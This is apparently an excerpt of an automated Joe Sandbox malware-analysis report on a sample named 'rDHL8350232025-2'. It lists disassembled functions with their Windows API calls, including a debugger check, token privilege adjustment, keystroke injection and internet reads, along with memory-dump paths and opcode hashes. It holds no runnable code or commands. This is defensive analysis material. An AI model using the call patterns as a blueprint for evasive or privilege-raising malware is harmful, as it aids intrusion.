                                                                                      • API String ID: 432972143-0
                                                                                      • Opcode ID: 413c3b8dc0bbfe7896f76b16ad650a49fd0ed9d606e33eab5de01d63988b8613
                                                                                      • Instruction ID: 709c7c5738494f01ddce2079a20e8e3f67f2b4d746163255f78d8cca070c6f3b
                                                                                      • Opcode Fuzzy Hash: 413c3b8dc0bbfe7896f76b16ad650a49fd0ed9d606e33eab5de01d63988b8613
                                                                                      • Instruction Fuzzy Hash: DA311830B40208AFFF358B69CC05BFE7BE6AB46320F04421AF585561D2D7749981E7E2
                                                                                      APIs
                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 000ACE89
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 000ACEEA
                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 000ACEFE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                      • String ID:
                                                                                      • API String ID: 234945975-0
                                                                                      • Opcode ID: d23279e1de64e41131eb44f19a57856ecfddb4a662bfed659f2004e0ed00d00a
                                                                                      • Instruction ID: 3195a8257061a49819b6bc06c5f455b35058b98fc0a8b5f2c08c483d3dd7451e
                                                                                      • Opcode Fuzzy Hash: d23279e1de64e41131eb44f19a57856ecfddb4a662bfed659f2004e0ed00d00a
                                                                                      • Instruction Fuzzy Hash: B8218C71500705AFFB70DFA5C948FAB77F8EB41354F11442AE64692152E774EE08CB90
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,00075222), ref: 0009DBCE
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0009DBDD
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0009DBEE
                                                                                      • FindClose.KERNEL32(00000000), ref: 0009DBFA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2695905019-0
                                                                                      • Opcode ID: 114ba7fc76cd965225c080397f1fc20ec15fbef13cfcd3cf89b46b188d45b14d
                                                                                      • Instruction ID: e4ffe73aef33fab172df3e90f9c5bc0ea6c221d3859b5199aa57823ddc31fc77
                                                                                      • Opcode Fuzzy Hash: 114ba7fc76cd965225c080397f1fc20ec15fbef13cfcd3cf89b46b188d45b14d
                                                                                      • Instruction Fuzzy Hash: 6CF0A0B085091197AA206B78EC0DCAA77AC9F02334B144703F83AC20E0EBB45D559695
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 000982AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen
                                                                                      • String ID: ($|
                                                                                      • API String ID: 1659193697-1631851259
                                                                                      • Opcode ID: ddfdb645a34b219a84174a9e96ffda63cd06e0b9ad661dbec6b3e989fa55d244
                                                                                      • Instruction ID: b9b2d131ab02e176b89267a87dd80ec98be62cdd15f6605baf76ee4fac305ed8
                                                                                      • Opcode Fuzzy Hash: ddfdb645a34b219a84174a9e96ffda63cd06e0b9ad661dbec6b3e989fa55d244
                                                                                      • Instruction Fuzzy Hash: A5323475A006059FCB28CF59C481AAAB7F0FF48710B15C46EE59ADB3A1EB70E981DB44
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000A5CC1
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 000A5D17
                                                                                      • FindClose.KERNEL32(?), ref: 000A5D5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: 6128ce7c68b90f9aef956b4d54d150d8455c62f6e939643da9f86a6c3c8a9bfb
                                                                                      • Instruction ID: 30072ae2b5cbaf2666bdd022af64befb43fe4669595e3e3c7a16aa8fa64d1f33
                                                                                      • Opcode Fuzzy Hash: 6128ce7c68b90f9aef956b4d54d150d8455c62f6e939643da9f86a6c3c8a9bfb
                                                                                      • Instruction Fuzzy Hash: 9151AC74604A019FD724CF68C894E9AB7E4FF4A324F14855DE99A8B3A2CB30ED44CF91
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0006271A
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00062724
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00062731
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: 4a1a4ab4a5ec66aec846782066cc4bb87d27381181e2aaf54f304a21d26400fe
                                                                                      • Instruction ID: 97fe67eae1f1bf861ec7cdf1b585daeb4403c1a61fcc078f99034e33c714ee5e
                                                                                      • Opcode Fuzzy Hash: 4a1a4ab4a5ec66aec846782066cc4bb87d27381181e2aaf54f304a21d26400fe
                                                                                      • Instruction Fuzzy Hash: 0531C27490121CABDB21DF68DC89BDDBBF8AF08310F5041EAE80CA6261E7349F858F45
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 000A51DA
                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000A5238
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 000A52A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                      • String ID:
                                                                                      • API String ID: 1682464887-0
                                                                                      • Opcode ID: 823693bd8f85fb0911c9a5243253dc0ae7643f4fc770cc0a976467dfa79137a0
                                                                                      • Instruction ID: ada5487d4ef2401ac32852814e356de12f197dee6c7c0395b476acd7886b6c7d
                                                                                      • Opcode Fuzzy Hash: 823693bd8f85fb0911c9a5243253dc0ae7643f4fc770cc0a976467dfa79137a0
                                                                                      • Instruction Fuzzy Hash: 6F312B75A00518DFEB00DF95D894FADBBB4FF49314F088099E809AB362DB35E855CB90
                                                                                      APIs
                                                                                        • Part of subcall function 0004FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00050668
                                                                                        • Part of subcall function 0004FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00050685
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                                                                      • GetLastError.KERNEL32 ref: 0009174A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                      • String ID:
                                                                                      • API String ID: 577356006-0
                                                                                      • Opcode ID: 4159380e9ad5aecdd763d4f9720f2d0db149e97a98ab7ff92a285a0bbeb9f53b
                                                                                      • Instruction ID: 6be384abe43934d8b310967a58f647a50f1ee88259a9995bf6e12eca073dbf8b
                                                                                      • Opcode Fuzzy Hash: 4159380e9ad5aecdd763d4f9720f2d0db149e97a98ab7ff92a285a0bbeb9f53b
                                                                                      • Instruction Fuzzy Hash: CB1191B2904306AFE7189F54EC86DAAB7F9EF44714B24852EE05657251EB70BC428A24
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0009D608
                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0009D645
                                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0009D650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 33631002-0
                                                                                      • Opcode ID: 6d3997fd86226308f91f271c88dca766b152fa9591a2889ada6decd9ed3bf666
                                                                                      • Instruction ID: a8a006425d87557a7d75a4a2ff5e50afaa248dd72c7bdbbe8c041dc9e8c1d5c2
                                                                                      • Opcode Fuzzy Hash: 6d3997fd86226308f91f271c88dca766b152fa9591a2889ada6decd9ed3bf666
                                                                                      • Instruction Fuzzy Hash: 22116175E45228BFEB208F95EC45FAFBFBCEB45B50F108116F908E7290D6704A059BA1
                                                                                      APIs
                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0009168C
                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000916A1
                                                                                      • FreeSid.ADVAPI32(?), ref: 000916B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                      • String ID:
                                                                                      • API String ID: 3429775523-0
                                                                                      • Opcode ID: c92b5361dc3becb45ff0683b544fd7299ce43a702653277b92df8ddc0f218384
                                                                                      • Instruction ID: eec54f05c84f5e6298d82c16d8878a7a6cfe457ff7e34ea699d073a1d3d1048c
                                                                                      • Opcode Fuzzy Hash: c92b5361dc3becb45ff0683b544fd7299ce43a702653277b92df8ddc0f218384
                                                                                      • Instruction Fuzzy Hash: 3BF0F471950309FBEF00DFE4DC89EAEBBBCFB08604F504565E901E2181E774AA449A54
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000,?,000628E9), ref: 00054D09
                                                                                      • TerminateProcess.KERNEL32(00000000,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000,?,000628E9), ref: 00054D10
                                                                                      • ExitProcess.KERNEL32 ref: 00054D22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 1fc941d92123b3a37075d50c230464da014c0a8c26b3d41ecea88954f1ad127e
                                                                                      • Instruction ID: 0606665a2986f318c4549e5d373c6b08165cf7829483aafcaea99607fbb75cef
                                                                                      • Opcode Fuzzy Hash: 1fc941d92123b3a37075d50c230464da014c0a8c26b3d41ecea88954f1ad127e
                                                                                      • Instruction Fuzzy Hash: 1EE0B631400148ABEF11AF54EE09E993B79FB41786B148018FC098B123CB3ADE86CAA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /
                                                                                      • API String ID: 0-2043925204
                                                                                      • Opcode ID: add8697db7c06a2cd6c33babc3753613f6c6e5acc55263e7c9fa8dff354b862b
                                                                                      • Instruction ID: bfd01b7f2bca449616e409a8ec0adf1c508854170d2354882763d68330e99317
                                                                                      • Opcode Fuzzy Hash: add8697db7c06a2cd6c33babc3753613f6c6e5acc55263e7c9fa8dff354b862b
                                                                                      • Instruction Fuzzy Hash: D5413B725002196FEB20DFB9DC49DBB77BAEB84314F504269F945D7281E6709E41CB50
                                                                                      APIs
                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 0008D28C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameUser
                                                                                      • String ID: X64
                                                                                      • API String ID: 2645101109-893830106
                                                                                      • Opcode ID: 3503a0894617159eb8ca37489b06c4552a4e24f3599cdb1f208f499b5c975ae9
                                                                                      • Instruction ID: a7e09d8eb9178bf21b2e3c263573a7b02a93900d1eb6aa56d3618a50eada6a3e
                                                                                      • Opcode Fuzzy Hash: 3503a0894617159eb8ca37489b06c4552a4e24f3599cdb1f208f499b5c975ae9
                                                                                      • Instruction Fuzzy Hash: CDD0C9B480112DEADBA0DB90EC88DDDB37CBB14305F100252F506A2040D73495488F10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction ID: acfec07cbdde247042bf01b9522f1f61f615afaf793eadb54fb7eb13df56bbd6
                                                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction Fuzzy Hash: 4C021C71E002199FEF14CFA9C884AAEBBF1EF48315F258169D819E7381D731AE45CB94
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000A6918
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A6961
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: 03e90ed50d0e252c912536acfeaf1a9cc2626f75e835c05b5667e60d0ad48d23
                                                                                      • Instruction ID: f682372b6bbaed95cf3608389238dfcee0e15adb55e0069f415de9f463bac683
                                                                                      • Opcode Fuzzy Hash: 03e90ed50d0e252c912536acfeaf1a9cc2626f75e835c05b5667e60d0ad48d23
                                                                                      • Instruction Fuzzy Hash: 3F11D3356042009FD710CF69C484E16BBE4FF85328F08C6A9E4698F2A2CB31EC05CB90
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,000B4891,?,?,00000035,?), ref: 000A37E4
                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,000B4891,?,?,00000035,?), ref: 000A37F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFormatLastMessage
                                                                                      • String ID:
                                                                                      • API String ID: 3479602957-0
                                                                                      • Opcode ID: 5f1b0ef6f078c28cfe85da05bb118e42ca2091d9795c523c453787f1438556ca
                                                                                      • Instruction ID: 30d707e595800fcb870e2b4b9eaef7015f65e8c3b8e67aa82bf182a9068ad687
                                                                                      • Opcode Fuzzy Hash: 5f1b0ef6f078c28cfe85da05bb118e42ca2091d9795c523c453787f1438556ca
                                                                                      • Instruction Fuzzy Hash: 00F0E5B16043282AF72057A69C4DFEF3AAEEFC5761F000175F509D22D1D9A09904C6B0
                                                                                      APIs
                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0009B25D
                                                                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0009B270
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: InputSendkeybd_event
                                                                                      • String ID:
                                                                                      • API String ID: 3536248340-0
                                                                                      • Opcode ID: 14a39df788aaf45cf0f93f773e7b55e605ef5b787d205c59d1ad57de1d67320d
                                                                                      • Instruction ID: 58c7c151142fcbade6054568f2302e3c61d6002fb06dc13193f18b39192c8918
                                                                                      • Opcode Fuzzy Hash: 14a39df788aaf45cf0f93f773e7b55e605ef5b787d205c59d1ad57de1d67320d
                                                                                      • Instruction Fuzzy Hash: 01F01D7180424DABEF159FA0D805BAE7BB4FF04315F00801AF955A5191C77996119F94
                                                                                      APIs
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000911FC), ref: 000910D4
                                                                                      • CloseHandle.KERNEL32(?,?,000911FC), ref: 000910E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                      • String ID:
                                                                                      • API String ID: 81990902-0
                                                                                      • Opcode ID: dd5f1485fe56f97f6dafe1df809310653b40da8773a7b633720feca1c21233cb
                                                                                      • Instruction ID: 9726d31d16692d446cf91d00e164c386a7d9e8379784e045e86d961bd92d13ca
                                                                                      • Opcode Fuzzy Hash: dd5f1485fe56f97f6dafe1df809310653b40da8773a7b633720feca1c21233cb
                                                                                      • Instruction Fuzzy Hash: 23E0BF72014651AEF7252B51FC05EB777E9EB04311B24882DF5A6804B1DB626C90EB54
                                                                                      Strings
                                                                                      • Variable is not of type 'Object'., xrefs: 00080C40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
